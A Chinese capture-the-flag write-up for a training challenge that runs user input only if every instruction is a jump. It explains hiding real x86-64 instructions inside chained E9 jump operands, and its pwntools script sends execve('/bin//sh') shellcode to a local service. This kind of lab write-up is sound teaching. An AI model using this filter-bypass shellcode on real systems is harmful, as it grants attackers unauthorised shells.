暑期集训shellcode5（手搓机器码）

拖进ida里面反汇编再让人工智能分析（我是废物）（后来给源码了，直接上源码）

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
#include <capstone/capstone.h>
#include <sys/mman.h>

int upkeep() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
}

int validate(char* ptr, size_t len) {
    csh handle;
    cs_insn *insn;
    int ret = 1;

    if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) {
        return 0;
    }
    size_t count = cs_disasm(handle, ptr, len, 0, 0, &insn);
    size_t success_len = 0;
    if (count > 0) {
        for (size_t j = 0; j < count; j++) {
            ret &= insn[j].mnemonic[0] == 'j';
            success_len += insn[j].size;
        }
        cs_free(insn, count);
    } else {
        return 0;
    }

    cs_close(&handle);

    ret &= len == success_len;
    return ret;
}


int main() {
    upkeep();

    char code[4096];
    size_t n = read(0, code, 0x1000);
    if (n > 0 && validate(code, n)) {
        ((void (*)())code)();
    }
    return 0;
}

发现本题的逻辑是只能输入‘j’相关的（jmp）指令，先补一下这里的知识

jmp

思路

简单来说就是可以利用jmp从当前指令跳转并执行下一条指令，将getshell的过程一步步分解执行

在ida里面简单实践一下

我们可以看到从当前指令到下一条指令只需要E9 01 00 00 00即可，所以我们每一条指令前都要加上这段。
接下来就是上网找较短的shellcode改成汇编指令再改成机器码，注意E9后只跟4个字节的指令，若超过4个字节需要替换成同义短于4个字节的指令。

WP

from pwn import *

sh = remote('127.0.0.1',42213)
#sh = process("./shellcode5")
context(log_level = 'debug', os = 'linux', arch = 'amd64')

shellcode = '''
\xE9\x01\x00\x00\x00
\xE9\x48\x31\xFF\x90

\xE9\x01\x00\x00\x00
\xE9\x48\x31\xF6\x90

\xE9\x01\x00\x00\x00
\xE9\x48\x31\xD2\x90

\xE9\x01\x00\x00\x00
\xE9\x48\x31\xC0\x90

\xE9\x01\x00\x00\x00
\xE9\x48\x31\xDB\x90

\xE9\x01\x00\x00\x00
\xE9\x50\x90\x90\x90

\xE9\x01\x00\x00\x00
\xE9\xB3\x68\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\xC1\xE3\x08

\xE9\x01\x00\x00\x00
\xE9\xB3\x73\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\xC1\xE3\x08

\xE9\x01\x00\x00\x00
\xE9\xB3\x2F\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\xC1\xE3\x08

\xE9\x01\x00\x00\x00
\xE9\xB3\x2F\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\xC1\xE3\x08

\xE9\x01\x00\x00\x00
\xE9\xB3\x6E\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\xC1\xE3\x08

\xE9\x01\x00\x00\x00
\xE9\xB3\x69\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\xC1\xE3\x08

\xE9\x01\x00\x00\x00
\xE9\xB3\x62\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\xC1\xE3\x08

\xE9\x01\x00\x00\x00
\xE9\xB3\x2F\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x53\x90\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x48\x89\xE7\x90

\xE9\x01\x00\x00\x00
\xE9\xB0\x3B\x90\x90

\xE9\x01\x00\x00\x00
\xE9\x0F\x05\x90\x90'''

#gdb.attach(sh)
#pause()
shellcode=shellcode.replace('\n',' ')
shellcode=shellcode.replace(' ','')

#print(shellcode)
    
sh.send(shellcode)
sh.interactive()

注意要将空格和换行符都删掉
当然也可以写汇编代码（）